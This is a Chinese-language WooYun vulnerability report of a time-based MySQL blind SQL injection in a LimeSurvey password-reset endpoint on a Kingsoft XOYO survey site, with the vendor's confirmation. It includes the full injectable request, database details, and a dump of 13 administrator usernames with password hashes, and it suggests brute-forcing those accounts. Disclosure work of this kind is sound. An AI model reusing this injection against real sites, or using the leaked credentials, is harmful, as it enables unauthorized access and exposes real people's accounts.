乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-05: 细节已通知厂商并且等待厂商处理中 2015-06-05: 厂商已经确认,细节仅向厂商公开 2015-06-15: 细节向核心白帽子及相关领域专家公开 2015-06-25: 细节向普通白帽子公开 2015-07-05: 细节向实习白帽子公开 2015-07-20: 细节向公众公开
金山逍遥某站点MySQL盲注
开源的问券调查系统LimeSurvey,老版本以前发现过上传和注射漏洞。注射点:
POST /index.php/admin/authentication/forgotpassword HTTP/1.1Content-Length: 177Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://survey.xoyo.comCookie: PHPSESSID=6913f244e676097d6328f8a43c5ef97cHost: survey.xoyo.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*action=forgotpass&checksessionbypost=&user=*
MySQL time blind.
current user: '[email protected].%'current database: 'ke_survey'
知道表名是lime_开头的。 因为是时间盲注,我就没去逐个猜表了。直接下个程序看看admin表在哪里:
http://download.limesurvey.org/latest-stable-release/limesurvey205plus-build150520.zip
获取到用户13个:
Database: ke_survey+------------+---------+| Table | Entries |+------------+---------+| lime_users | 13 |+------------+---------+
Table: lime_users[13 entries]+---------------+------------------------------------------------------------------+----------------------------+| users_name | password | email |+---------------+------------------------------------------------------------------+----------------------------+| admin | 91c2d3714c5671614870aaeaa0629bc68d531cb159da752f4b85b418b43be48f | [email protected] || changguofeng | 6be3148756bc2ff7eea2c09528c8bc5e734a7b44304bfa2db6ab1f905e59f970 | [email protected] || chenwenting | 8915bc0cddda4b87152d2e9176d4404ebeb79d6a69525cea57bc516ecc83ecbc | [email protected] || fangjieying | 7f2e1b39c55ec4a6ec0de44081cd6304db8f5cd09d124a53c00b7fd37b53afd9 | [email protected] || ganlu | 6d87522f8659a8ceadb31986d199b338055b7d247b49dd09fb964d06e280fd4c | [email protected] || liujunli | fb71ba10ebd3a565241e7549449f94c25403a99782d935a7e3fc179f168e575c | [email protected] || sunjuanjuan | 0faf36e7c04d4dd207d728aee3fca3fb2620594bf90eb9fb5e42cd401acf0e1c | [email protected] || SuWeitian | 44ce86e8d4f2f8dc39f4290834d7bd1dbbcb51a2da158024bcd362f074ff891b | [email protected] || wangtengfei | d88cbcc684727710979948d5bcb0b3350db0a4c4d73d673c1009876dae749fe6 | [email protected] || zhangbingdong | 95c27b074169a37d8fa15b631effa2580dd628b6c02adb7400f5bc3c79fde8c5 | [email protected] || zhangtianhui | 3a61fb1d1a36f0912812c812fe1c6797339067d8ed41673d4beecb4ed2ecdc02 | [email protected] || zhangyashu | 7d3ca7f93dd1a0257f20406b3abbc3c70de206ed9a9cabaefc7ee85769b09254 | [email protected] || zhuyanling | 44fdda6528867440cd9ef4d5de6cb089b989399ab74eef64dc68082a20169987 | [email protected] |+---------------+------------------------------------------------------------------+----------------------------+
没有进一步去尝试解开密码,不是直接md5。 但是有了用户名,这里可以尝试暴力破解了已经。
参数过滤
危害等级:高
漏洞Rank:10
确认时间:2015-06-05 10:54
收到,非常感谢!
2015-06-17:活动业务已下线